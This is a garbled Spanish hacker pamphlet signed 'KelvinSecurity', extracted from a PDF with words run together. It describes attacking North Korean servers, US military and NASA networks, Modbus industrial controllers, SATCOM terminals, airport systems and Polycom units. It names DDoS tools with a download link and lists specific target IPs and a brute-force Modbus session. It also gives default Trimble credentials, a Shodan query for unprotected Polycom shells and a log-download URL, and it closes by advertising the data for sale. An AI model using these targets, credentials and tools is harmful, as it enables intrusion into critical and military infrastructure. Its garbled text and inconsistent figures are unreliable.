Está en la página 1de 27

RedesMilitares­UnaLuchaContraEl

Pentagono

RedesMilitares­UnaLuchaContraEl Pentagono Escrito por kelvin parra 02 de julio del 2016 con información

Escrito por kelvin parra 02 de julio del 2016 con información detalladayextraadjuntoparasuventaesteaño.

_Elejércitodelosestadosunidosesahoraunosdelosejércitos

quehatomadoaccionesparaprevenirataquesexterioresqueafecten

lossistemasautomatizadosycomputarizadosqueseencuentranensus

basesdeoperaciónenelárea“nuclear,energéticayarmamentística”

la disa lleva ya 2 años buscando la forma de cómo evitar que comandosdeotrospaísescomoen“russia”,chinaonorthkorea”

categorizados como “amenazas” han llevado

informaciónmilitaraelgobiernodelosestadosunidosypenetrado

sussistemasinformáticosconelfindetenercontrolremotodesde

estadosunidosenquepodríainvolucraruna“MalaAcción”yllevar

unaguerraentrepaísesquefueronaliados.

ataques y robo de

North korea cuenta con servidores “informáticos” de acuerdo a periódicos los ataquesqueharecibidonorthkoreadesdeestados unidosomejordichouna“Simulación”utilizandounVPNdeestados unidossiendoelatacantedeotropaíspuedeestallarunaguerra digital “North Korea” emite que sus sistemasinformáticosfueron penetrado alguna vez pero estos sistemas se encuentran ahora protegidomayormentecontraataques“DDoS”peroaunasíseencuentra vulnerablesaataquesdepenetracióndesistemasinformáticos.

­­Estadísticas­­

­­Estadísticas­­ EstossonlospuertosqueutilizanlosservidoresdeNorthkoreay es

EstossonlospuertosqueutilizanlosservidoresdeNorthkoreay es que north korea no tolera acciones deataquesinformáticosy menosataquesdedenegacióndeserviciosasusmediosinformáticos

pero

identificados.

también

conocemos

que

existen

sistemas operativos

Alrededor de unos 538 servidores en Pyongyang y servidores con sistemas“Windowsun40%y linuxun90%”tansoloalgunospuedense vulneradospormediodeexploits.

­­DatosQueDebesSaber­­

DDoSYAutomatizaciónEnNorthKorea

Servidores

HTTP: Puede ser muy fácil para emitir ataques de denegación de

servicioyaqueestossuelencaerfácilmenteelpuerto80.

Protección:VPNDireccionatuordenadorahorateencuentrasenotro país lanzando ataques de petición de acceso sobre cargando el límitedelservidor.

HerramientaDePirataBásico:Slowloris,DDoSerRelease.

HerramientaDePirataMedio:Booter,botnet,Davoset,UFONET.

Protección A Servidores: Cloudflare adjunto con millones de servidoresinvolucrartuwww­sitealosproductosdeproteccionanti ddosoherramientasautomatizadasqueprocesanvulnerabilidades.

HerramientasDireccionesDeDescarga:

Las herramienta automatizadas de las que hablamos las puedes descargarjustoaquí:

DAVOSET >https://github.com/MustLive/DAVOSET

Existenherramientasquesebasanenpáginasquesonutilizadas esas “vulnerabilidades” para utilizarlas como “Bots” que puedan atacar a la pagina “Victima” pero esta deberá atacar a los servidoresqueutilizannoutilizanHTTPSéstasseprotegendelos

ataquesyevitanun65%delosataquesporlotantoesaconsejable

tomarladirección“IP”xxx.xxx.x.xparacomenzarelataque.

RDPACCESOREMOTO

Encontramos una puerta una ventana RDP para tener acceso a un ordenador remotamente pero el problema principal de la conexión

puertoelpuerto3389nosbloqueayaqueesunuso“personal”entre

comunicación entre empresas y personal de trabajo conocemos un acceso más facilitado yporelpuerto5900unaccesoremotoque podemosteneraccesoenalgunossinproblemas.

podemosteneraccesoenalgunossinproblemas. detallesdelservidor: IP: 195.154.237.19 City

detallesdelservidor:

IP:

195.154.237.19

City

Pyongyang

Country

Korea,DemocraticPeople'sRepublicof

Organization

Iliad­Entreprises

ISP

OnlineS.a.s.

LastUpdate

2016­06­20T15:59:44.207481

Hostnames

founderwikit411.me

ASN

AS12876

VULNERABILIDADES:

1)BSoD_>pantallazoazul

2)BruteForce_>Necesario“wordlist”“userlist”

Herramienta­xTSCrack

Sieresdenorthkoreaovisitasnorthkoreatienesqueteneren claro que deberás cumplirsusreglasunadeellaes“limitarel accesoainternet”yesquenohayproblemaenutilizar“cámaras” “videograbadoras”paraturistasperoeninternetsiselimitara.

“videograbadoras”paraturistasperoeninternetsiselimitara. laagencianacionaldeseguridadNSAfueestudiandodistintasáreas

laagencianacionaldeseguridadNSAfueestudiandodistintasáreas denorthkoreaparaobservarexactamenteyestudiartodasuredde proveedores ­ ISP de “servidores” hosteados aun así la NSA

necesitaráciertos0daysparallegaraexplotarvulnerabilidadesde

plataformasdenorthkoreaunadeellapodríasercomo“romperesos servidoresqueaunestandoenapecheybasadosenPHPlenguajede programaciónrequeriríanundesarrollodeunexploitcompletamente funcional que se comprometa a vulnerar los servidores de north korea”.

la mayoría van a una misma dirección podría ser la central proveedoradeinternetqueseencuentranenlascoordenadasdela imagenelmétododeataquemásefectivoes:

denegacióndeservicio=>apagóndeservidores RoboDeBaseDeDatos =>funcionalparaespionajeSTMP­DNI

peroestoesfuncionablesoloparaeldepartamentodedefensaademas quefacilitaalgobiernodelosestadosunidosallevarposibles planificaciones deguerra“identificandoalindividuo”ofertasde dineroacambiodeinformación“ataquededenegaciondeservicio” paraverlaextensaconectavilidaddemilitaresnorthkoreanoscon losportalesyservidoreswebs.

Ladisahamantenidocomunicacionescifradasyprivadasunade ellasescon“SATCOM”paracomunicacionradialadistanciadesdela base

Ladisahamantenidocomunicacionescifradasyprivadasunade ellasescon“SATCOM”paracomunicacionradialadistanciadesdela base emisora hasta el el receptor “Militar” representando a las redes del DoD ­ pentagono lo cual facilitaalejercitodelos estados unidos su mision capacitacion en redes y estrategias militares.

Datosdeservicio:

1)coberturaporIPinfraestructuraporvoz,videoydatos

2)VaríaconIPV4yIPV6

3)conexión con satelites proveedores tanto comerciales como militares.

ElAEHFesunsateliteoperacionalmilitaraunquepocoseinvolucra

enoperacionesmilitaresconelpentagonoigualqueelsateliteUFO

cadaunotienesusmisionesyporcadacualalgunostienendeforma

cofidencialexplicarsusfunciones.

Enunaguerracontraelgobiernodelosestadosunidosporredescon

unpaisenemigoseconocelossiguientesrasgos:

Operaciones de red informática: Se compone de ataque a la red informática, defensa delaredinformática,ylasoperacionesde explotacióndelaredinformáticadeapoyorelacionadas.

Ataquealaredinformática:Lasmedidasadoptadasatravésdeluso

deredesdeordenadoresparainterrumpir,negar,degradarodestruir

lainformaciónalmacenadaenlosordenadoresyredesinformáticas,o

losordenadoresylaspropiasredes.

Defensadelaredinformática:Lasmedidasadoptadasatravésdel uso de redes de ordenadores para proteger, controlar, analizar, detectar y responder a la actividad no autorizadadentrodelos sistemas de información del Departamento de Defensa y las redes informáticas.

laexplotacióndelaredinformática:operacionesycapacidadesde recolección de inteligencia llevadas a cabo a travésdelusode redesinformáticasquepermiterecopilardatosdelossistemasde informacióndeobjetivoodeadversarioautomatizadooredes.

sabemos que existen distintos tipos de redes informáticas del pentagonotodasorganizadasporlaDISA unaqueotraquesehan hechopúblicaquefuncionanporsatelite,voz,datos,mensajeríay vpn.

MensajeriaCofidencial:

vpn. MensajeriaCofidencial: pormediodelDeepSpaceNetworksconocidocomo“Reddelespacio

pormediodelDeepSpaceNetworksconocidocomo“Reddelespacio

profundo”quesegúntextossenarraquesonmilesdeantenasdela

NASAentodoelmundoparacomunicarseconsondasespaciales.

en cuanto se trata de comunicación la nasa logra cifrar la comunicación militar del departamento de defensa operacional en medioorientepormediodeTeléfonosVOIPpuedesersencillospara elpentagonoutilizarproductosdepolycomylaNASAencargadade encryptaryestablecerunacomunicacionsegura.

pero hay un problema y es que estos software de comunicacion satelitalpuedenserinsegurosporpartedelanasaprovedoresde redescomo“NationalAeronauticsandSpaceAdministration”puedeser

vulnerada sus servidores Huntsville, estados unidos contando con servidores con sistemas operativos como linux 3.x puede ser vulnerablesaalgunexploitlaversionenkerneldeservidorescon

linux3.xnohasidonotificadoalgunexploitencambiola2.6si

esto ocurre cuando se utiliza la automatizacion de herramientas contraestosservidoresel“nationalaeronautics”comoproveedorde

1997

redes se encuentra trabajando con alrededor de

servidoreslistosfuncionandoyconelloelkerneldelinuxademas

encontramosotroscomowindows.

unos

Thedeepspacepuedeserotrodelosmuchosproyectoscomolosque

existencomoelfamosohaarp,resultaquethedeepspacesolose

encargademantenercomunicacionesmilitarespormediodeantesy

satelitesdelanasaconelobjetivodecomunicacionyseguimiento

comoelestudiodefrencuenciasylasincronizaciondesubsistemas

noesdenosotrosloshackersperopodriaserestudiado.

existenotrostiposdecomunicacionesotraesconocidacomolaVoSIP estetipodecomunicacionesaunutilizadopormilitaresyesqueel VOIPenalgunosyotroscasosesutilizadoperosoloenoficinasdel pentagonoencambioVoSIPunsistemadeprotocoloIPquenavegapor medio del VSAT comunicacion satelital es emitidosucomunicacion pero no lo suficiente por las antenas de los “the deep space networks”porelloseutilizansatalitesmilitarescomosonlosmas utilizadoscomoenSATCOM.

comunicacion:

1)fax

2)mensajeriadevoz

3)SMS

perotodosconectadosaunared

en departamento de seguridad nacional “homeland security” ha creadounportalquellevaunoscuantosañosinterceptandoataquesy vulnerabirilidadesasistemasdecontrolindustrial

vulnerabirilidadesasistemasdecontrolindustrial por medio del portal web ​

por medio del portal web https://ics­cert.us­cert.gov/alerts se puede observar vulnerabirilidades que afectan a sistemas de supervision y control a scada software que se encuentran en industriasalrededordelmundoyconectadasaunaproveedorade conexionalaredlapreocupaciondemuchosesqueestossoftwares lointegrenaunaISPalaproveedoradeinternetyconherramientas de busqueda se les facilite a los blackhat hackers encontrarla auditarlasyluegovenderlasconfinesmalignos.

­­Categoríadeunsistemaindustrial­­

ICS:sistemadecontrolindustrial

SCADA:sistemadesupervisión

PLC:Controladorprogramable

DCS:distribucióndelsistemadecontrol

RTU:TerminalRemoto

Productosdelaindustria:

1)Modbus 3)dnp

5)HART 7)OMRON

QueEsYAtacandoAModBus:

QueEsYAtacandoAModBus: DESCRIPCIÓN:Esunprotocolodecomunicacionessituadoenelnivel

DESCRIPCIÓN:Esunprotocolodecomunicacionessituadoenelnivel

7delModeloOSI,basadoenlaarquitecturamaestro/esclavo(RTU)o

cliente/servidor(TCP/IP).

Protocolos:

1)RTU:Lacomunicaciónentredispositivosserealizapormedio

dedatosbinarios. 2)La comunicación entre dispositivos se hace por medio de caracteresASCII

Vulnerabilidadesymetodosdeataque:

2)La comunicación entre dispositivos se hace por medio de caracteresASCII Vulnerabilidadesymetodosdeataque:

El ataque a modbuspormediodeexploitpuedeserutilizadopor herramientasautomatizadayporelloexisteunkit:

en la foto que vimos anteriormente se encuentra la lista de explotaciónalsistemadecomunicaciónindustrialmodbus.

ensuataquedefuerzabruta:

SMODmodbus(uid)>setRHOSTS192.168.1.6

SMODmodbus(uid)>exploit [+]ModuleBruteForceUIDStart

[+]StartBruteForceUIDon:192.168.1.6

[+]UIDon192.168.1.6is:10

sencillo deentenderlaejecucióndeellatambientenemosotros metodos de explotacion en diferencia que se encuentra entre el ataquededenegarelservicioalacomunicacióndelmodbusconHMIy elsistemasupervisiónascada.

Descripcióndelaherramienta:

smod es un marco modular con todo tipo de funciones de diagnósticoyofensivoquepuedanecesitarconelfindePenTest protocolo Modbus. Es una implementación del protocolo Modbus completausandoPythonyScapy.Estesoftwaresepuedeejecutaren

Linux/OSXbajo2.7.x.

ProductosModbusporelmundo:

Producto:

Cantidad:

BMXP34

­569

BMXNOE0100 ­218

SASTSXETY4103­205

TM221CE40R

­62

A9MEM3255

­33

TenemoslacomunicaciónconSATCOMtambiénhablaremosdeellayes importante porque también está en el uso militar y aeroespacial además en sistemas industriales la infraestructura SATCOM puede dividirseendosgrandessegmentos,elespacioyelsuelo.

Elespacioincluyeaquelloselementosnecesariosparaimplementar,

mantenerunseguimientoycontroldeunasatélite.Plantaincluyela

infraestructuranecesariaparaaccederaunrepetidordelsatélite.

PartesEsencialesDeSATCOM:

IOActive: llevó a cabo la fase inicial de un proyecto de investigaciónSATCOMinterna.Estafasesecentróenelanálisisy la ingeniería inversa de la libre y disponible para el público actualizacionesdefirmwareparalastecnologíasSATCOM

ElobjetivodeIOActiveeraproporcionarunaevaluacióninicialde la situación de seguridad de los más ampliamente desplegado terminalesInmarsateIridiumSATCOM.Seanalizaronlosdispositivos utilizadosparaaccederaestosservicios:

Inmarsat:

utilizadosparaaccederaestosservicios: Inmarsat: Este Sistema de Comunicación marítima proporciona

Este Sistema de Comunicación marítima proporciona buque­costera, costera­buque,yServiciosDebuquedeunbuque.SusCapacidadesDe Almacenamiento y Hacia Adelante Hacen Posible utilizarlo párrafo télex,fax,Datos,oporCorreoelectrónico.

Elenfoquesecentraendosáreasprincipalescríticos:

Recopilacióndeinformación

Ingenieríainversa

Recopilacióndeinformación:

La mejor manera de encontrar una manera de poner en peligro la seguridaddeunsistemaesporlacomprensióndecómofunciona.Como resultado,larecopilacióndeinformaciónesunapiezafundamental.

Durante esta fase, se recopiló la mayor cantidad de información posiblesobreelobjetivoatravésdeOpenSourceIntelligence.

IOActivebuscainformaciónquesepuedeutilizarparaconstruirun

modelodelequipo.Algunosdeloscontenidosquebuscamosson:

Hojasdedatos

Implementaciónyapoyoguías

Casosdeéxito

Manuales

Lasadquisicionespúblicas

Notasdeprensa

Elmaterialmultimedia(vídeos,presentaciones,imágenes

Software/Firmware

)

Todoesanalizadoyevaluadocuidadosamente.Lainformaciónextraída

deestefasedebepermitirqueelinvestigadorpararesponderuna

seriedecuatropreguntasbásicas:

•¿Cómosediseñóelsistema?

•¿Cuálessonsuscomponentes?

•¿Cómosesueleimplementarenescenariosdelmundoreal?

•¿Cuálessonsusprincipalescaracterísticas?

Ingenieríainversa:

Estamosfrenteaunescenarioenelqueelobjetivoprincipal,el

dispositivofísico,puedeserinaccesible.Porlotanto,tenemosque

compensarestadesventajamediantelaaplicacióndelaanálisisde

doscomponentesfundamentales:

Softwaredeconfiguración

firmware

Softwaredeconfiguración:

Los vendedores suelen proporcionar a los clientes software de clienteparaconfigurarycontrolarelequipamiento.Poringeniería inversa sobre estos programas podemos entender cómo el objetivo espera para comunicarse con el mundo exterior y el tipo de protocolosymecanismosdepropiedadinvolucradosenesteproceso.

IOActiveamenudosedesarrollaundispositivosimuladoparaengañar

al software de configuración en pensando que en realidad está conectadoaundispositivoreal.Nosaprovechamosdeesteentorno

para

supuestamente acepta, así como las salidas de las software de configuracióndeespera.Estosdatossonposteriormenteaprovechar paraanalizarlafirmware.

recoger

el conjunto

de

entradas que un dispositivo

firmware:

Mientrasqueelsoftwaredeconfiguraciónseconstruyegeneralmente

portresplataformasprincipales:Windows,Mac,oLinux,elfirmware

esmásheterogéneo.Haymuchoscomponentes:

Múltiples Real Time Operating Systems RTOS, procesadores, chips, placas,periféricos,interfaces,yasísucesivamente.Estohaceque el análisis de la firmware una tarea que consume tiempo, que requieremuyconocimientoespecífico.Elenfoquebásicoconsisteen lareconstruccióndelossímbolos,cuerdareferencias,ymapasde memoria.Entonces,elfirmwareseingenieríainversaconelfinde

Mapadefuncionalidadesacódigo.

Identificarlospuntosdeentrada

Descubrirfuncionalidadesindocumentados

Lasamenazasplanteadasporestasvulnerabilidadesmerecenla calma,medidoanálisis.Dichoesto,desdeunpuntodevistatécnico, no es

Lasamenazasplanteadasporestasvulnerabilidadesmerecenla calma,medidoanálisis.Dichoesto,desdeunpuntodevistatécnico, no es aconsejable para las entidades comerciales de restar importancia a la gravedad de los riesgos para las empresas que dependendelaintegridadysecretodedichascomunicaciones.Como se ha explicado en la introducción, algunas delasserviciosde acceso a estos productos son críticos desde una perspectiva de seguridad.

vulnerabilidades:

puertastraseras:

Losmecanismosutilizadosparaaccederafuncionesnodocumentadaso

interfacesnodestinadosallosusuariosfinales.

Lascredencialescodificadas:

credencialessinpapelesquesepuedenutilizarparaautenticaren las interfaces documentados espera que esté disponible para la interacción del usuario. Los protocolos inseguros protocolos que representanunriesgoparalaseguridaddocumentada.

Protocolosindocumentados:

protocolossinpapeles,oprotocolosnodestinadosalosusuarios

finales,querepresentanunaseguridadriesgo.

Débilrestablecimientodecontraseña:

Mecanismo que permite restablecer passwords.services de otros productos éstos son críticos acceso desde una perspectiva de seguridad.

ataquecontralasterminalesBGANHarris:

de seguridad. ataquecontralasterminalesBGANHarris:

AmbosterminalesBGANHarrismóvilesterrestresportátilylatierra están destinados a ser utilizados por el militar. El propósito principal de estos terminales, como el RF­7800B,esproporcionar capacidadesdelaredderadiotácticasmejoradas.Seutilizanen combinaciónconradiosdefinidasporsoftware.

capacidadesdelaredderadiotácticasmejoradas.Seutilizanen combinaciónconradiosdefinidasporsoftware.

LasvulnerabilidadesIOActivequeseencuentranenelterminal RF­7800B permiten a un atacante instalar firmware malicioso o ejecutarcódigoarbitrario.Unposibleataquedelmundorealpodría ocurrir

comosigue:

1.Mediantelaexplotacióndelasvulnerabilidadeslistadosenun

atacante inyecta

ejecutándose en un ordenador portátil conectado a la infectada

malicioso código en el terminal. malware

terminal,podríaimplementarestacargaútil.

El código malicioso utiliza el GPS incorporado para obtener las coordenadas donde el sistema se encuentra. Esto permitiría al atacanteparacompararelsistemadeposiciónconunáreafija(zona objetivo),dondeunataquedelasfuerzasenemigasesplanificado.

2.SisedetectauncontextodeProtocolodeDatosdePaquetes(PDP)

o el sistema entra en el zona objetivo, el código malicioso deshabilitalascomunicacionesoinclusodañoslaterminal.

3.Lacapacidaddelasvíctimasdecomunicarlosdatosvitaleso

pedir ayuda a realizar un contra­ataque es limitada o incluso cortar.Enelpeordeloscasos,pérdidadevidasesposible.

LosescenariosdeataquecontraVSATmarinayTerminalesFBB:

LosescenariosdeataquecontraVSATmarinayTerminalesFBB: ElCobhamMARINERO900VSAT,CobhammarineroFByJRCJUE­250/500FB

ElCobhamMARINERO900VSAT,CobhammarineroFByJRCJUE­250/500FB

terminales están desplegados tanto en buques como parte de un sistemadecomunicaciónporsatéliteounsistemaInmarsatFB.

Numerososserviciosutilizanelenlaceporsatélite:

•Teléfono,RDSI,SMS,yVoIP •Internetdebandaancha •Correoelectrónicoytransferenciadearchivos •Multi­voz •Videoconferencia

•Seguridad505yelbotónrojo

•Avisoalosnavegantes

•regulacionesMarítimo/puerto

•ECDIS

•Recipientedeenrutamiento

•GestióndelaCarga

•Elmantenimientoplanificado/predictivo

•RadiosobreIP(RoIP)atravésdewalkietalkie

Escenariouno:

lascartasnáuticaslasvulnerabilidadesenestosterminaleshacen ataques que interrumpen o información parodia consumida por los sistemasdenavegacióndeabordo,talescomoECDIS,técnicamente posible,yaquelascartasdenavegaciónsepuedenactualizaren tiemporealvíasatélite.

Escenariodos:

Integridad Operacional la capacidad de controlar el enlace de satélitedeunrecipientesepuedeutilizarparaponerlaoperativa integridaddelosbuquesdecargaensituaciónderiesgo.enlaces SATCOM menudo se utilizan para el seguimiento del estado y la condición de los buques portacontenedores en tránsito. Esto es especialmente importante cuando el transporte de mercancías sensibles,comomunicionesoproductosquímicospeligrosos.

Lainformaciónoperativapermiteaunpropietariodelacargaal ejecutar la maniobra adecuada y abordar cualquier situación potencial.

Unadelascosasquelespreocupaaldepartamentodedefensaesla seguridad en los aeropuertos por ello mientras más tecnología

Unadelascosasquelespreocupaaldepartamentodedefensaesla

seguridad en los aeropuertos por ello mientras más tecnología

integran

vulnerabilidadesentreelloslosdetectoresdemetales.

influye las

en

el

aeropuerto

de

igual manera

influye las en el aeropuerto de igual manera DEESTAFORMASEVISUALIZAELEQUIPAJEPROCESADOPORELHARDWAREY

DEESTAFORMASEVISUALIZAELEQUIPAJEPROCESADOPORELHARDWAREY LUEGOEMITIDOALSOFTWARELOCUALLOPUEDESOBSERVAR,RESULTAQUEEL SOFTWAREFUNCIONAENWINDOWSXPPERODENTRODELSOFTWAREEXISTEUN FORMATO EN .CFG PARA ABRIR PUEDES UTILIZAR UNLECTORDEFORMATO ONLINEODESCARGARTEALGUNSOFTWAREQUETELOPERMITE.

QUEESUNFORMATOCFG:

Los CFG, o archivos de configuración, se utilizan para configurarlosajustesinicialesparalosprogramasdeordenadory son utilizados por una amplia gama de programas y aplicaciones. AlgunosarchivosCFGtambiénsecreancuandosecambianlosajustes deunprogramaoaplicacióninformática.

AHORAABRIMOSELFORMATOLLAMADOUSERS.CFGYVEMOSLACONTRASEÑADE

ACCESO:

ACCESO: INICIODESOFTWARE"CREDENCIALES"PETICION:

INICIODESOFTWARE"CREDENCIALES"PETICION:

ACCESO: INICIODESOFTWARE"CREDENCIALES"PETICION: BUSCANDOLASCREDENCIALES:

BUSCANDOLASCREDENCIALES:

OTROPROBLEMABÁSICOQUEPODEMOSENCONTRARESUNBYPASSDEACCESO INGRESAMOSCARACTERESPEROALAVEZELPANELDEACCESOALPESARDE

OTROPROBLEMABÁSICOQUEPODEMOSENCONTRARESUNBYPASSDEACCESO

INGRESAMOSCARACTERESPEROALAVEZELPANELDEACCESOALPESARDE

NOTIFICARNOSCOMO"ERROR"AUNASÍENTRAALSISTEMA.

NOTIFICARNOSCOMO"ERROR"AUNASÍENTRAALSISTEMA. NOSDAELERROR AUNQUEAUNASÍNOSLLEVAALPANELADMINISTRATIVO

NOSDAELERROR

NOSDAELERROR AUNQUEAUNASÍNOSLLEVAALPANELADMINISTRATIVO AHORA VAMOS HAY

AUNQUEAUNASÍNOSLLEVAALPANELADMINISTRATIVO

NOSDAELERROR AUNQUEAUNASÍNOSLLEVAALPANELADMINISTRATIVO AHORA VAMOS HAY UN POCO CON UN SISTEMA AUTOMATIZADO EL

AHORA VAMOS HAY UN POCO CON UN SISTEMA AUTOMATIZADO EL SISTEMA BIOMETRICOQUESEENCUENTRANENAEREOPUERTOSQUEPERMITENELACCESO ALPERSONAL.

Trimbletambienesunsoftwareyhardwareutilizadoporelejercito de estados unidos para fijar posiciones muchos de ellos suelen

Trimbletambienesunsoftwareyhardwareutilizadoporelejercito de estados unidos para fijar posiciones muchos de ellos suelen detallar el estado del hardware por medio del display del dispositivoydeellogestionaunadireccionIPenelcualpormedio deproveedoresdeinternetydenuestraherramientashodanpodemos visualizarlascontraseñaspordefectoson:

usuario:admin password:password

HTTP/1.1401AuthorizationRequired

WWW­Authenticate:Basicrealm="Trimble"

Server:TRMB/1.2

Date:Mon,18Jul201610:58:12GMT

Cache­Control:no­cache,must­revalidate Pragma:no­cache

Expires:Fri,30Oct199814:19:41GMT

Connection:close

Content­Type:text/html

biensabemosqueestotieneciertafuncionalidadunadeellases

cambiarelnombrededispositivoymodificaciondevalores.

Unapuertaapolycompormediodeshodaneslabusquedapormedio del puerto 23 a la ejecucion desde la terminal “Polycom Shell

Unapuertaapolycompormediodeshodaneslabusquedapormedio del puerto 23 a la ejecucion desde la terminal “Polycom Shell Command” la ejecucion para la manipulacion de comandosyporel

puerto80o8080laentradaalamanipulacion.

polycomesutilizadoexactamenteparavideo­conferenciasyloque registra polycom encuantollamadaseslacomunicacionentreuna “IP” yotra“IP”parasucomunicacionperoexistenotrossistemas devideoconferenciaqueseestencomunicando.

FuncionesDeHacker:

1)descargadehistorialdellamadasaotrosservidores

2)descargademensajeria

3)subidadeimagenaldisplaydelpolycom

4)descargadebackup

5)modificaciondecontraseñaoasignaciondealguna

kelvinsecurityparajugarseunpococonestoloquehizofuebuscar

enshodandelasiguienteformayabrirelvinculoyentradoporel

puertocorrecto.

Vinculo:

https://www.shodan.io/search?query=port%3A23+polycom+shell+country%3

A%22US%22

Autentificacion:“NINGUNA”seestableciopordefectoydehechono fue asignada ninguna contraseña tenemos control total solamente utilizandoelcomandoshodanqueteproporcionamosparaeluso.

Ejemplo:

Puerto23:

PolycomCommandShell

XCOMhost:

localhostport:4121

TTYname:

/dev/pts/0

Sessiontype:telnet

Puerto80:

HTTP/1.1200OK

Cache­Control:max­age=0

Content­Type:text/html Transfer­Encoding:chunked

Date:Tue,21Jun201619:30:59GMT

Server:lighttpd

en

entraremosporelpuerto80.

Server: ​ lighttpd en entraremosporelpuerto80. ­­mapadelservidor­­

­­mapadelservidor­­

ahoramostraremosalgunosdeellosencuantoajustes.

Opciones:

1)descargaregistrodelsistema:

http://72.237.88.234/a_getlog.cgi?name=messages

2)Enviarunmensaje

javascript:GoTo('a_sendamessage.htm')

3)Protectordepantalla:

javascript:GoTo('a_screensaver.htm')

javascript:GoTo('a_screensaver.htm') enprotectordepantallaesalgoquepodemosutilizarencasoque

enprotectordepantallaesalgoquepodemosutilizarencasoque querramos que nuestra victima sepa que estamos en su polycom y tenemoscontroldesuscontactosymensajes.

esta opcion nos va a ayudar que nuestra victima se de cuenta subiendounaimagencontamañoexacto.

detallesdeimagen:

FormatoPNG,colorde32bits,<=300x300píxeles@72ppp

EltamañodelarchivoPNGtieneunalimitaciónde87,9Kbytes.

Escuriosoqueunaaereonaveesteactualizandounservidorcon conversacionesestecasosetratadeunaaereonavedelejercitocon servidor

Escuriosoqueunaaereonaveesteactualizandounservidorcon conversacionesestecasosetratadeunaaereonavedelejercitocon servidor SATCOM un acceso por el puerto 21 ftp­open­xxxxx nos permiterealizarlabusquedadeesamensajeriaqueseencuentraen unformato.html

nos permiterealizarlabusquedadeesamensajeriaqueseencuentraen unformato.html podemosdescargaresasconversaciones.

podemosdescargaresasconversaciones.

nos permiterealizarlabusquedadeesamensajeriaqueseencuentraen unformato.html podemosdescargaresasconversaciones.

GraciasPorLeerNuestrosArchivos

InformatedeLaPróximaCompra

Por“KelvinSecurityFanPage”.

­­KelvinSecurity­­

<0x1>Team_